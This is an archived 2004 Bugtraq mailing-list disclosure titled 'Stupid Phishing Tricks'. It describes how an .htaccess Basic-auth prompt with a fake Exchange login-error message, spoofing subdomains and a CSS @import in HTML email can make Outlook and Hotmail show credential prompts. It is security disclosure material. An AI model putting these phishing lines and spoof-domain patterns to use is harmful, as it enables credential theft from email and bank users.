[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200405211346.i4LDkl3W022607__12182.3571892039$1085154459@web125.megawebservers.com>
Date: Fri, 21 May 2004 13:46:47 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: Stupid Phishing Tricks
Phriday , May 21, 2004
Several pheeble yet interesting phishing possibilities arise as
phollows:
Take one .htaccess trivially modified to suit the target
scenario:
AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic
One throw-away domain which can include the target's host name:
http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com
A couple of ridiculous email contraptions:
<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
</STYLE>
1. Outlook Express
[screen shot http://www.malware.com/phool.png 56KB]
2. Outlook 2003
[screen shot: http://www.malware.com/ohlook.png 39KB]
note: the above 'style sheet' works on outbound [reply to] [so
much for not downloading external content] inbound can be
achieved as well via http://securityfocus.com/bid/10369 which
has an even more convincing network login applet
3. Hotmail
[screen shot: http://www.malware.com/goturmail.png 91KB]
hint : hotmail[and other] web designer people; off-set the html
login form on the site as many prime banks have done.
The possibilities are obviously endless.
BE AWARE OF THE SHARKS OUT THERE
NB: anyone have any contact or connection to the upper
management security or abuse dept. of one public company called:
SAVVIS Communications. http://savvis.net/ it appears their abuse
dept. is woefully negligent in attending to abuse affairs.
End Call
--
http://www.malware.com
Powered by blists - more mailing lists